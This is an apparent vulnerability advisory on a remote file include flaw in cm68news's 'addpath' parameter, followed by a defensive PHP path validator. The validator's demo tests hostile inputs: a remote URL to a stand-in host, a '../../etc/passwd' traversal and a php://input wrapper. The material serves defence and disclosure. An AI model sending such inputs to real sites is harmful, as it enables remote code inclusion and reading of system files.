Vendor: cm68news
By: Paul Bakoyiannis
CVSS: 7.5 HIGH
Remote File Include
CWE: 98
Product Name: cm68news
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
cm68news Remote File Include Vulnerability
A remote file include vulnerability exists in cm68news, a web-based news management system. The '/engine/oldnews.inc.php' script does not properly sanitize the 'addpath' variable before using it in an include() call. An attacker can exploit this to include arbitrary files from remote hosts by passing a URL in the 'addpath' parameter. Successful exploitation requires that 'allow_url_fopen' is enabled on the target host.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized before being used in an include() call.
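One way to apply that validation before an include() call, as an added example that is not cm68news code: the function name resolve_include(), the file header.inc.php and the temporary directory are hypothetical, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a caller-supplied relative path to a file inside $baseDir.
 * Throws rather than returning anything include() could treat as a URL
 * or as a path outside the application tree.
 */
function resolve_include(string $baseDir, string $requested): string
{
    // Reject stream wrappers (http://, ftp://, php://, data: ...) and NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested)) {
        throw new InvalidArgumentException('not a local relative path');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // realpath() collapses ../ and symlinks, and returns false for missing targets.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('outside base directory');
    }
    return $target;
}

// Constructed demo: a temp directory stands in for the application's include directory.
$base = sys_get_temp_dir() . '/rfi_demo_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents($base . '/header.inc.php', "<?php echo \"local header\\n\";");

// Constructed inputs: one legitimate file, a remote URL, a traversal, a wrapper.
$samples = ['header.inc.php', 'http://example.invalid/x.txt?', '../../etc/passwd', 'php://input'];
foreach ($samples as $s) {
    try {
        $path = resolve_include($base, $s);
        echo "ALLOW  $s\n";
        include $path; // only reached for files that resolved inside $base
    } catch (InvalidArgumentException $e) {
        echo "REJECT $s (" . $e->getMessage() . ")\n";
    }
}
unlink($base . '/header.inc.php');
rmdir($base);
```

Where the include path never needs to vary per request, defining it as a constant in server-side configuration removes the user-controlled input entirely.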